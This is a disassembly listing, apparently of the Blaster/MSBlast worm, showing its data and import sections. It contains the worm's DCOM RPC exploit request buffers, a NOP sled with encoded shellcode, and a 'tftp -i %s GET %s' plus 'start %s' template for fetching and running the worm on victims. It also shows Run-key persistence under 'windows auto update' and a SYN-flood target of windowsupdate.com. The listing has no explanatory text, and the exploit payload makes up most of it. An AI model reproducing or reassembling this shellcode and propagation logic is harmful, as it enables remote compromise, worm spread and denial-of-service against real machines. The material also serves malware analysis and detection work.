.data:00404108 db 70h, 5Eh, 0Dh, 0, 2, 0, 0, 0, 7Ch, 5Eh, 0Dh, 0, 0, 0, 0, 0; 64
.data:00404108 db 10h, 0, 0, 0, 80h, 96h,0F1h,0F1h, 2Ah, 4Dh,0CEh, 11h,0A6h, 6Ah, 0, 20h; 80
.data:00404108 db 0AFh, 6Eh, 72h,0F4h, 0Ch, 0, 0, 0, 4Dh, 41h, 52h, 42h, 1, 0, 0, 0; 96
.data:00404108 db 0, 0, 0, 0, 0Dh,0F0h,0ADh,0BAh, 0, 0, 0, 0,0A8h,0F4h, 0Bh, 0; 112
.data:00404108 db 60h, 3, 0, 0, 60h, 3, 0, 0, 4Dh, 45h, 4Fh, 57h, 4, 0, 0, 0; 128
.data:00404108 db 0A2h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0, 0, 0, 0, 46h; 144
.data:00404108 db 38h, 3, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0, 0, 0, 0, 46h; 160
.data:00404108 db 0, 0, 0, 0, 30h, 3, 0, 0, 28h, 3, 0, 0, 0, 0, 0, 0; 176
.data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh,0C8h, 0, 0, 0, 4Dh, 45h, 4Fh, 57h; 192
.data:00404108 db 28h, 3, 0, 0,0D8h, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0; 208
.data:00404108 db 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 224
.data:00404108 db 0, 0, 0, 0,0C4h, 28h,0CDh, 0, 64h, 29h,0CDh, 0, 0, 0, 0, 0; 240
.data:00404108 db 7, 0, 0, 0,0B9h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 256
.data:00404108 db 0, 0, 0, 46h,0ABh, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 272
.data:00404108 db 0, 0, 0, 46h,0A5h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 288
.data:00404108 db 0, 0, 0, 46h,0A6h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 304
.data:00404108 db 0, 0, 0, 46h,0A4h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 320
.data:00404108 db 0, 0, 0, 46h,0ADh, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 336
.data:00404108 db 0, 0, 0, 46h,0AAh, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 352
.data:00404108 db 0, 0, 0, 46h, 7, 0, 0, 0, 60h, 0, 0, 0, 58h, 0, 0, 0; 368
.data:00404108 db 90h, 0, 0, 0, 40h, 0, 0, 0, 20h, 0, 0, 0, 78h, 0, 0, 0; 384
.data:00404108 db 30h, 0, 0, 0, 1, 0, 0, 0, 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh; 400
.data:00404108 db 50h, 0, 0, 0, 4Fh,0B6h, 88h, 20h,0FFh,0FFh,0FFh,0FFh, 0, 0, 0, 0; 416
.data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 432
.data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 448
.data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 464
.data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 480
.data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh; 496
.data:00404108 db 48h, 0, 0, 0, 7, 0, 66h, 0, 6, 9, 2, 0, 0, 0, 0, 0; 512
.data:00404108 db 0C0h, 0, 0, 0, 0, 0, 0, 46h, 10h, 0, 0, 0, 0, 0, 0, 0; 528
.data:00404108 db 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 78h, 19h, 0Ch, 0; 544
.data:00404108 db 58h, 0, 0, 0, 5, 0, 6, 0, 1, 0, 0, 0, 70h,0D8h, 98h, 93h; 560
.data:00404108 db 98h, 4Fh,0D2h, 11h,0A9h, 3Dh,0BEh, 57h,0B2h, 0, 0, 0, 32h, 0, 31h, 0; 576
.data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 80h, 0, 0, 0, 0Dh,0F0h,0ADh,0BAh; 592
.data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 608
.data:00404108 db 18h, 43h, 14h, 0, 0, 0, 0, 0, 60h, 0, 0, 0, 60h, 0, 0, 0; 624
.data:00404108 db 4Dh, 45h, 4Fh, 57h, 4, 0, 0, 0,0C0h, 1, 0, 0, 0, 0, 0, 0; 640
.data:00404108 db 0C0h, 0, 0, 0, 0, 0, 0, 46h, 3Bh, 3, 0, 0, 0, 0, 0, 0; 656
.data:00404108 db 0C0h, 0, 0, 0, 0, 0, 0, 46h, 0, 0, 0, 0, 30h, 0, 0, 0; 672
.data:00404108 db 1, 0, 1, 0, 81h,0C5h, 17h, 3, 80h, 0Eh,0E9h, 4Ah, 99h, 99h,0F1h, 8Ah; 688
.data:00404108 db 50h, 6Fh, 7Ah, 85h, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 704
.data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0; 720
.data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 30h, 0, 0, 0, 78h, 0, 6Eh, 0; 736
.data:00404108 db 0, 0, 0, 0,0D8h,0DAh, 0Dh, 0, 0, 0, 0, 0, 0, 0, 0, 0; 752
.data:00404108 db 20h, 2Fh, 0Ch, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0; 768
.data:00404108 db 0, 0, 0, 0, 3, 0, 0, 0, 46h, 0, 58h, 0, 0, 0, 0, 0; 784
.data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 10h, 0, 0, 0, 30h, 0, 2Eh, 0; 800
.data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 816
.data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 68h, 0, 0, 0, 0Eh, 0,0FFh,0FFh; 832
.data:00404108 db 68h, 8Bh, 0Bh, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 848
.data:00404468 request2 db 20h, 0, 0, 0, 0, 0, 0, 0, 20h, 0, 0, 0, 5Ch, 0, 5Ch, 0; 0
.data:00404478 request3:
.data:00404478 unicode 0, <\C$\123456111111111111111.doc>,0
.data:004044B4 sc:
.data:004044B4 unicode 0, <FXNBFXFXNBFXFXFXFX>
.data:004044D8 dd 0FFFFFFFFh
.data:004044DC dd 7FFDE0CCh
.data:004044E0 dd 7FFDE0CCh
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 0
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 16
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 32
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 48
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 64
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 80
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 96
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 112
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 128
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 144
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h,0EBh, 19h, 5Eh, 31h,0C9h, 81h,0E9h, 89h,0FFh; 160
.data:004044E4 db 0FFh,0FFh, 81h, 36h, 80h,0BFh, 32h, 94h, 81h,0EEh,0FCh,0FFh,0FFh,0FFh,0E2h,0F2h; 176
.data:004044E4 db 0EBh, 5,0E8h,0E2h,0FFh,0FFh,0FFh, 3, 53h, 6, 1Fh, 74h, 57h, 75h, 95h, 80h; 192
.data:004044E4 db 0BFh,0BBh, 92h, 7Fh, 89h, 5Ah, 1Ah,0CEh,0B1h,0DEh, 7Ch,0E1h,0BEh, 32h, 94h, 9; 208
.data:004044E4 db 0F9h, 3Ah, 6Bh,0B6h,0D7h, 9Fh, 4Dh, 85h, 71h,0DAh,0C6h, 81h,0BFh, 32h, 1Dh,0C6h; 224
.data:004044E4 db 0B3h, 5Ah,0F8h,0ECh,0BFh, 32h,0FCh,0B3h, 8Dh, 1Ch,0F0h,0E8h,0C8h, 41h,0A6h,0DFh; 240
.data:004044E4 db 0EBh,0CDh,0C2h, 88h, 36h, 74h, 90h, 7Fh, 89h, 5Ah,0E6h, 7Eh, 0Ch, 24h, 7Ch,0ADh; 256
.data:004044E4 db 0BEh, 32h, 94h, 9,0F9h, 22h, 6Bh,0B6h,0D7h, 4Ch, 4Ch, 62h,0CCh,0DAh, 8Ah, 81h; 272
.data:004044E4 db 0BFh, 32h, 1Dh,0C6h,0ABh,0CDh,0E2h, 84h,0D7h,0F9h, 79h, 7Ch, 84h,0DAh, 9Ah, 81h; 288
.data:004044E4 db 0BFh, 32h, 1Dh,0C6h,0A7h,0CDh,0E2h, 84h,0D7h,0EBh, 9Dh, 75h, 12h,0DAh, 6Ah, 80h; 304
.data:004044E4 db 0BFh, 32h, 1Dh,0C6h,0A3h,0CDh,0E2h, 84h,0D7h, 96h, 8Eh,0F0h, 78h,0DAh, 7Ah, 80h; 320
.data:004044E4 db 0BFh, 32h, 1Dh,0C6h, 9Fh,0CDh,0E2h, 84h,0D7h, 96h, 39h,0AEh, 56h,0DAh, 4Ah, 80h; 336
.data:004044E4 db 0BFh, 32h, 1Dh,0C6h, 9Bh,0CDh,0E2h, 84h,0D7h,0D7h,0DDh, 6,0F6h,0DAh, 5Ah, 80h; 352
.data:004044E4 db 0BFh, 32h, 1Dh,0C6h, 97h,0CDh,0E2h, 84h,0D7h,0D5h,0EDh, 46h,0C6h,0DAh, 2Ah, 80h; 368
.data:004044E4 db 0BFh, 32h, 1Dh,0C6h, 93h, 1, 6Bh, 1, 53h,0A2h, 95h, 80h,0BFh, 66h,0FCh, 81h; 384
.data:004044E4 db 0BEh, 32h, 94h, 7Fh,0E9h, 2Ah,0C4h,0D0h,0EFh, 62h,0D4h,0D0h,0FFh, 62h, 6Bh,0D6h; 400
.data:004044E4 db 0A3h,0B9h, 4Ch,0D7h,0E8h, 5Ah, 96h, 80h,0AEh, 6Eh, 1Fh, 4Ch,0D5h, 24h,0C5h,0D3h; 416
.data:004044E4 db 40h, 64h,0B4h,0D7h,0ECh,0CDh,0C2h,0A4h,0E8h, 63h,0C7h, 7Fh,0E9h, 1Ah, 1Fh, 50h; 432
.data:004044E4 db 0D7h, 57h,0ECh,0E5h,0BFh, 5Ah,0F7h,0EDh,0DBh, 1Ch, 1Dh,0E6h, 8Fh,0B1h, 78h,0D4h; 448
.data:004044E4 db 32h, 0Eh,0B0h,0B3h, 7Fh, 1, 5Dh, 3, 7Eh, 27h, 3Fh, 62h, 42h,0F4h,0D0h,0A4h; 464
.data:004044E4 db 0AFh, 76h, 6Ah,0C4h, 9Bh, 0Fh, 1Dh,0D4h, 9Bh, 7Ah, 1Dh,0D4h, 9Bh, 7Eh, 1Dh,0D4h; 480
.data:004044E4 db 9Bh, 62h, 19h,0C4h, 9Bh, 22h,0C0h,0D0h,0EEh, 63h,0C5h,0EAh,0BEh, 63h,0C5h, 7Fh; 496
.data:004044E4 db 0C9h, 2,0C5h, 7Fh,0E9h, 22h, 1Fh, 4Ch,0D5h,0CDh, 6Bh,0B1h, 40h, 64h, 98h, 0Bh; 512
.data:004044E4 db 77h, 65h, 6Bh,0D6h, 93h,0CDh,0C2h, 94h,0EAh, 64h,0F0h, 21h, 8Fh, 32h, 94h, 80h; 528
.data:004044E4 db 3Ah,0F2h,0ECh, 8Ch, 34h, 72h, 98h, 0Bh,0CFh, 2Eh, 39h, 0Bh,0D7h, 3Ah, 7Fh, 89h; 544
.data:004044E4 db 34h, 72h,0A0h, 0Bh, 17h, 8Ah, 94h, 80h,0BFh,0B9h, 51h,0DEh,0E2h,0F0h, 90h, 80h; 560
.data:004044E4 db 0ECh, 67h,0C2h,0D7h, 34h, 5Eh,0B0h, 98h, 34h, 77h,0A8h, 0Bh,0EBh, 37h,0ECh, 83h; 576
.data:004044E4 db 6Ah,0B9h,0DEh, 98h, 34h, 68h,0B4h, 83h, 62h,0D1h,0A6h,0C9h, 34h, 6, 1Fh, 83h; 592
.data:004044E4 db 4Ah, 1, 6Bh, 7Ch, 8Ch,0F2h, 38h,0BAh, 7Bh, 46h, 93h, 41h, 70h, 3Fh, 97h, 78h; 608
.data:004044E4 db 54h,0C0h,0AFh,0FCh, 9Bh, 26h,0E1h, 61h, 34h, 68h,0B0h, 83h, 62h, 54h, 1Fh, 8Ch; 624
.data:004044E4 db 0F4h,0B9h,0CEh, 9Ch,0BCh,0EFh, 1Fh, 84h, 34h, 31h, 51h, 6Bh,0BDh, 1, 54h, 0Bh; 640
.data:004044E4 db 6Ah, 6Dh,0CAh,0DDh,0E4h,0F0h, 90h, 80h, 2Fh,0A2h, 4, 0; 656
.data:00404780 request4 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 20h, 0, 0, 0, 30h, 0, 2Dh, 0; 0
.data:00404780 db 0, 0, 0, 0, 88h, 2Ah, 0Ch, 0, 2, 0, 0, 0, 1, 0, 0, 0; 16
.data:00404780 db 28h, 8Ch, 0Ch, 0, 1, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0; 32
.data:004047B0 g_zerobuf60 db 3Ch dup(0)
.data:004047EC aWindowsupdate_ db 'windowsupdate.com',0 ; DATA XREF: WUSYNFloodThread+E^o
.data:004047FE aS_0 db '%s',0Ah,0 ; DATA XREF: infectTarget+47F^o
.data:00404802 aStartS db 'start %s',0Ah,0 ; DATA XREF: infectTarget+432^o
.data:0040480C aTftpISGetS db 'tftp -i %s GET %s',0Ah,0 ; DATA XREF: infectTarget+3C4^o
.data:0040481F aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: infectTarget+36E^o
.data:0040482B aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: infect20Hosts+8C^o
.data:0040482B ; sendTCP80SYN+66^o
.data:00404837 aRb db 'rb',0 ; DATA XREF: TFTPServerThread+BA^o
.data:0040483A aM db 'M',0 ; DATA XREF: WinMain+2CB^o
.data:0040483C aD db 'd',0 ; DATA XREF: WinMain+2B2^o
.data:0040483E a_ db '.',0 ; DATA XREF: WinMain+18C^o
.data:0040483E ; WinMain+1AE^o ...
.data:00404840 aS db '%s',0 ; DATA XREF: WinMain+17B^o
.data:00404843 aBilly db 'BILLY',0 ; DATA XREF: WinMain+4F^o
.data:00404849 aWindowsAutoUpd db 'windows auto update',0 ; DATA XREF: WinMain+3A^o
.data:0040485D aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
.data:0040485D ; DATA XREF: WinMain+20^o
.data:0040488B align 4
.data:0040488B _data ends
.data:0040488B
.idata:004051C8 ;
.idata:004051C8 ; Imports from WS2_32.DLL
.idata:004051C8 ;
.idata:004051C8 ; Section 4. (virtual address 00005000)
.idata:004051C8 ; Virtual size : 000006C0 ( 1728.)
.idata:004051C8 ; Section size in file : 000006C0 ( 1728.)
.idata:004051C8 ; Offset to raw data for section: 00002400
.idata:004051C8 ; Flags C0000060: Text Data Readable Writable
.idata:004051C8 ; Alignment : 16 bytes ?
.idata:004051C8 ; ---------------------------------------------------------------------------
.idata:004051C8
.idata:004051C8 ; Segment type: Externs
.idata:004051C8 ; _idata
.idata:004051C8 ; u_short __stdcall __imp_htons(u_short hostshort)
.idata:004051C8 extrn __imp_htons:dword ; DATA XREF: htons^r
.idata:004051CC ; int __stdcall __imp_ioctlsocket(SOCKET s,__int32 cmd,u_long *argp)
.idata:004051CC extrn __imp_ioctlsocket:dword ; DATA XREF: ioctlsocket^r
.idata:004051D0 ; unsigned __int32 __stdcall __imp_inet_addr(const char *cp)
.idata:004051D0 extrn __imp_inet_addr:dword ; DATA XREF: inet_addr^r
.idata:004051D4 ; char *__stdcall __imp_inet_ntoa(struct in_addr in)
.idata:004051D4 extrn __imp_inet_ntoa:dword ; DATA XREF: inet_ntoa^r
.idata:004051D8 ; int __stdcall __imp_recvfrom(SOCKET s,char *buf,int len,int flags,struct sockaddr *from,int *fromlen)
.idata:004051D8 extrn __imp_recvfrom:dword ; DATA XREF: recvfrom^r
.idata:004051DC ; int __stdcall __imp_select(int nfds,fd_set *readfds,fd_set *writefds,fd_set *exceptfds,const struct timeval *timeout)
.idata:004051DC extrn __imp_select:dword ; DATA XREF: select^r
.idata:004051E0 ; int __stdcall __imp_send(SOCKET s,const char *buf,int len,int flags)
.idata:004051E0 extrn __imp_send:dword ; DATA XREF: send^r
.idata:004051E4 ; int __stdcall __imp_sendto(SOCKET s,const char *buf,int len,int flags,const struct sockaddr *to,int tolen)
.idata:004051E4 extrn __imp_sendto:dword ; DATA XREF: sendto^r
.idata:004051E8 ; int __stdcall __imp_setsockopt(SOCKET s,int level,int optname,const char *optval,int optlen)
.idata:004051E8 extrn __imp_setsockopt:dword ; DATA XREF: setsockopt^r
.idata:004051EC ; SOCKET __stdcall __imp_socket(int af,int type,int protocol)
.idata:004051EC extrn __imp_socket:dword ; DATA XREF: socket^r
.idata:004051F0 ; struct hostent *__stdcall __imp_gethostbyname(const char *name)
.idata:004051F0 extrn __imp_gethostbyname:dword ; DATA XREF: gethostbyname^r
.idata:004051F4 ; int __stdcall __imp_bind(SOCKET s,const struct sockaddr *name,int namelen)
.idata:004051F4 extrn __imp_bind:dword ; DATA XREF: bind^r
.idata:004051F8 ; int __stdcall __imp_gethostname(char *name,int namelen)
.idata:004051F8 extrn __imp_gethostname:dword ; DATA XREF: gethostname^r
.idata:004051FC ; int __stdcall __imp_closesocket(SOCKET s)
.idata:004051FC extrn __imp_closesocket:dword ; DATA XREF: closesocket^r
.idata:00405200 ; int __stdcall __imp_WSAStartup(WORD wVersionRequested,LPWSADATA lpWSAData)
.idata:00405200 extrn __imp_WSAStartup:dword ; DATA XREF: WSAStartup^r
.idata:00405204 ; int _imp_WSACleanup(void)
.idata:00405204 extrn __imp_WSACleanup:dword ; DATA XREF: WSACleanup^r
.idata:00405208 ; int __stdcall __imp_connect(SOCKET s,const struct sockaddr *name,int namelen)
.idata:00405208 extrn __imp_connect:dword ; DATA XREF: connect^r
.idata:0040520C ; int __stdcall __imp_getpeername(SOCKET s,struct sockaddr *name,int *namelen)
.idata:0040520C extrn __imp_getpeername:dword ; DATA XREF: getpeername^r
.idata:00405210 ; int __stdcall __imp_getsockname(SOCKET s,struct sockaddr *name,int *namelen)
.idata:00405210 extrn __imp_getsockname:dword ; DATA XREF: getsockname^r
.idata:00405214 ; SOCKET __stdcall __imp_WSASocketA(int af,int type,int protocol,LPWSAPROTOCOL_INFOA lpProtocolInfo,GROUP g,DWORD dwFlags)
.idata:00405214 extrn __imp_WSASocketA:dword ; DATA XREF: WSASocketA^r
.idata:00405218
.idata:0040521C
.idata:00405220 ;
.idata:00405220 ; Imports from WININET.DLL
.idata:00405220 ;
.idata:00405220 extrn __imp_InternetGetConnectedState:dword
.idata:00405220 ; DATA XREF: InternetGetConnectedState^r
.idata:00405224
.idata:00405228
.idata:0040522C ;
.idata:0040522C ; Imports from KERNEL32.DLL
.idata:0040522C ;
.idata:0040522C ; void __stdcall __imp_ExitProcess(UINT uExitCode)
.idata:0040522C extrn __imp_ExitProcess:dword ; DATA XREF: ExitProcess^r
.idata:00405230 ; void __stdcall __imp_ExitThread(DWORD dwExitCode)
.idata:00405230 extrn __imp_ExitThread:dword ; DATA XREF: ExitThread^r
.idata:00405234 ; LPSTR _imp_GetCommandLineA(void)
.idata:00405234 extrn __imp_GetCommandLineA:dword
.idata:00405234 ; DATA XREF: GetCommandLineA^r
.idata:00405238 ; int __stdcall __imp_GetDateFormatA(LCID Locale,DWORD dwFlags,const SYSTEMTIME *lpDate,LPCSTR lpFormat,LPSTR lpDateStr,int cchDate)
.idata:00405238 extrn __imp_GetDateFormatA:dword
.idata:00405238 ; DATA XREF: GetDateFormatA^r
.idata:0040523C ; DWORD _imp_GetLastError(void)
.idata:0040523C extrn __imp_GetLastError:dword ; DATA XREF: GetLastError^r
.idata:00405240 ; DWORD __stdcall __imp_GetModuleFileNameA(HMODULE hModule,LPSTR lpFilename,DWORD nSize)
.idata:00405240 extrn __imp_GetModuleFileNameA:dword
.idata:00405240 ; DATA XREF: GetModuleFileNameA^r
.idata:00405244 ; HMODULE __stdcall __imp_GetModuleHandleA(LPCSTR lpModuleName)
.idata:00405244 extrn __imp_GetModuleHandleA:dword
.idata:00405244 ; DATA XREF: GetModuleHandleA^r
.idata:00405248 ; BOOL __stdcall __imp_CloseHandle(HANDLE hObject)
.idata:00405248 extrn __imp_CloseHandle:dword ; DATA XREF: CloseHandle^r
.idata:0040524C ; DWORD _imp_GetTickCount(void)
.idata:0040524C extrn __imp_GetTickCount:dword ; DATA XREF: GetTickCount^r
.idata:00405250 extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwind^r
.idata:00405254 ; HANDLE __stdcall __imp_CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes,BOOL bInitialOwner,LPCSTR lpName)
.idata:00405254 extrn __imp_CreateMutexA:dword ; DATA XREF: CreateMutexA^r
.idata:00405258 ; void __stdcall __imp_Sleep(DWORD dwMilliseconds)
.idata:00405258 extrn __imp_Sleep:dword ; DATA XREF: Sleep^r
.idata:0040525C ; BOOL __stdcall __imp_TerminateThread(HANDLE hThread,DWORD dwExitCode)
.idata:0040525C extrn __imp_TerminateThread:dword
.idata:0040525C ; DATA XREF: TerminateThread^r
.idata:00405260 ; HANDLE __stdcall __imp_CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes,DWORD dwStackSize,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,DWORD dwCreationFlags,LPDWORD lpThreadId)
.idata:00405260 extrn __imp_CreateThread:dword ; DATA XREF: CreateThread^r
.idata:00405264
.idata:00405268
.idata:0040526C ;
.idata:0040526C ; Imports from ADVAPI32.DLL
.idata:0040526C ;
.idata:0040526C ; LONG __stdcall __imp_RegCloseKey(HKEY hKey)
.idata:0040526C extrn __imp_RegCloseKey:dword ; DATA XREF: RegCloseKey^r
.idata:00405270 ; LONG __stdcall __imp_RegCreateKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD Reserved,LPSTR lpClass,DWORD dwOptions,REGSAM samDesired,LPSECURITY_ATTRIBUTES lpSecurityAttributes,PHKEY phkResult,LPDWORD lpdwDisposition)
.idata:00405270 extrn __imp_RegCreateKeyExA:dword
.idata:00405270 ; DATA XREF: RegCreateKeyExA^r
.idata:00405274 ; LONG __stdcall __imp_RegSetValueExA(HKEY hKey,LPCSTR lpValueName,DWORD Reserved,DWORD dwType,const BYTE *lpData,DWORD cbData)
.idata:00405274 extrn __imp_RegSetValueExA:dword
.idata:00405274 ; DATA XREF: RegSetValueExA^r
.idata:00405278
.idata:0040527C
.idata:00405280 ;
.idata:00405280 ; Imports from CRTDLL.DLL
.idata:00405280 ;
.idata:00405280 extrn __imp___GetMainArgs:dword ; DATA XREF: __GetMainArgs^r
.idata:00405284 ; int __cdecl _imp_atoi(const char *)
.idata:00405284 extrn __imp_atoi:dword ; DATA XREF: atoi^r
.idata:00405288 ; void __cdecl _imp_exit(int)
.idata:00405288 extrn __imp_exit:dword ; DATA XREF: exit^r
.idata:0040528C extrn __imp_fclose:dword ; DATA XREF: fclose^r
.idata:00405290 extrn __imp_fopen:dword ; DATA XREF: fopen^r
.idata:00405294 extrn __imp_fread:dword ; DATA XREF: fread^r
.idata:00405298 ; void *__cdecl _imp_memcpy(void *,const void *,size_t)
.idata:00405298 extrn __imp_memcpy:dword ; DATA XREF: memcpy^r
.idata:0040529C ; void *__cdecl _imp_memset(void *,int,size_t)
.idata:0040529C extrn __imp_memset:dword ; DATA XREF: memset^r
.idata:004052A0 extrn __imp_raise:dword ; DATA XREF: raise^r
.idata:004052A4 ; int _imp_rand(void)
.idata:004052A4 extrn __imp_rand:dword ; DATA XREF: rand^r
.idata:004052A8 extrn __imp_signal:dword ; DATA XREF: signal^r
.idata:004052AC extrn __imp_sprintf:dword ; DATA XREF: sprintf^r
.idata:004052B0 ; void __cdecl _imp_srand(unsigned int)
.idata:004052B0 extrn __imp_srand:dword ; DATA XREF: srand^r
.idata:004052B4 ; char *__cdecl _imp_strchr(const char *,int)
.idata:004052B4 extrn __imp_strchr:dword ; DATA XREF: strchr^r
.idata:004052B8 ; char *__cdecl _imp_strtok(char *,const char *)
.idata:004052B8 extrn __imp_strtok:dword ; DATA XREF: strtok^r
.idata:004052BC
.idata:004052BC
.idata:004052BC
.idata:004052BC end start